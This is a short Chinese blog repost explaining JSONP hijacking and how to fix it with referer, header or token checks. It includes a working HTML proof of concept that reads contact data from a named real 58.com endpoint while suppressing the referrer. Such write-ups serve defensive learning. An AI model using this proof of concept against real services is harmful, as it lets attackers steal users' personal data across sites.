JSONP劫持

发出空refer的POC

<!DOCTYPE html>
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>

<script>
function asd(json){
    alert(JSON.stringify(json));
}

</script>
<script src="https://jiameng.58.com/collect/contactInfo?callback=asd"></script>
</body>
</html>

修复

  • 验证refer或者header
  • token
场景 APP调用的后端接口存在jsonp劫持

在该场景中,APP没有统一设置refer,也即大部分请求没有refer。
这导致了refer不可取。
没有设置refer,意味着所有请求其实和第三方来源请求都是一样的,服务器也分不清。
最后的想法,APP端通常很多奇怪的header,而csrf/jsonp劫持的payload难以设置header,所以可以判断header。

为什么难以发出自定义header的请求

转载于:https://www.cnblogs.com/huim/p/11005938.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JSONP利用CSRF漏洞的原理是通过利用JSONP的特性,即可以跨域读取数据的能力,来进行恶意操作。当一个网站使用JSONP来获取数据时,它会在请求中包含一个callback函数名作为参数。攻击者可以构造一个恶意网页,在其中通过script标签发起一个JSONP请求,将callback函数指向自己的恶意代码。当用户访问这个恶意网页时,浏览器会执行其中的JSONP请求,从而触发恶意代码的执行。由于JSONP请求会携带用户的身份凭证(如cookie),攻击者可以利用这些凭证进行恶意操作,比如修改用户资料、进行授权登录等。这就是JSONP利用CSRF漏洞的原理。\[1\]\[2\] #### 引用[.reference_title] - *1* *2* [浅谈CSRF跨域读取型漏洞之JSONP劫持](https://blog.csdn.net/qq_63701832/article/details/129372608)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [JSONP 劫持](https://blog.csdn.net/weixin_38885346/article/details/116333516)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值